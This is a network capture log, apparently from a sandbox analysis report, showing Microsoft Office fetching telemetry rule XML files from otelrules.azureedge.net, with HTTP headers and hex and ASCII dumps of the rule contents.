                                  2024-11-12 15:41:59 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                  Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                  2024-11-12 15:41:59 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                  Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                  2024-11-12 15:41:59 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                  Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                  2024-11-12 15:41:59 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                  Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                  2024-11-12 15:41:59 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                  2024-11-12 15:41:59 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                  Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  13192.168.2.44976713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:00 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:00 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:00 GMT
                                  Content-Type: text/xml
                                  Content-Length: 408
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                  ETag: "0x8DC582BB56D3AFB"
                                  x-ms-request-id: f8aed360-a01e-0032-69a0-341949000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154200Z-15869dbbcc6sg5zbhC1DFWy5u800000007w0000000003dfz
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:00 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  14192.168.2.44976413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:00 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:00 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:00 GMT
                                  Content-Type: text/xml
                                  Content-Length: 3788
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                  ETag: "0x8DC582BAC2126A6"
                                  x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154200Z-16547b76f7fm7xw6hC1DFW5px40000000fn000000000puwa
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:00 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  15192.168.2.44976513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:00 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:00 UTC517INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:00 GMT
                                  Content-Type: text/xml
                                  Content-Length: 2160
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                  ETag: "0x8DC582BA3B95D81"
                                  x-ms-request-id: dcc6854f-e01e-0051-7b03-2d84b2000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154200Z-16547b76f7fxsvjdhC1DFWprrs0000000fvg000000000w44
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:00 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  16192.168.2.44976813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:00 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:00 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:00 GMT
                                  Content-Type: text/xml
                                  Content-Length: 2980
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                  ETag: "0x8DC582BA80D96A1"
                                  x-ms-request-id: 6d064dc7-d01e-005a-12a0-347fd9000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154200Z-17df447cdb5vp9l9hC1DFW5hw800000007x0000000002ymu
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:00 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  17192.168.2.44976613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:00 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:00 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:00 GMT
                                  Content-Type: text/xml
                                  Content-Length: 450
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                  ETag: "0x8DC582BD4C869AE"
                                  x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154200Z-16547b76f7f8dwtrhC1DFWd1zn0000000g0g000000003hnr
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:00 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  18192.168.2.44977113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:01 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:01 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:01 GMT
                                  Content-Type: text/xml
                                  Content-Length: 471
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                  ETag: "0x8DC582BB10C598B"
                                  x-ms-request-id: 9d8ed93b-d01e-00a1-36a7-3435b1000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154201Z-15869dbbcc6tjwwhhC1DFWn2280000000980000000006ud2
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:01 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  19192.168.2.44976913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:01 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:01 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:01 GMT
                                  Content-Type: text/xml
                                  Content-Length: 474
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                  ETag: "0x8DC582B9964B277"
                                  x-ms-request-id: 41fe7c09-d01e-0028-68a0-347896000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154201Z-15869dbbcc62nmdhhC1DFW2sxs00000006h00000000012pn
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:01 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  20192.168.2.44977313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:01 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:01 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:01 GMT
                                  Content-Type: text/xml
                                  Content-Length: 467
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                  ETag: "0x8DC582BA6C038BC"
                                  x-ms-request-id: 6ba2b82c-f01e-0071-33a3-34431c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154201Z-15869dbbcc6xcpf8hC1DFWxtx00000000mv0000000002t0p
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:01 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  21192.168.2.44977213.107.246.45443
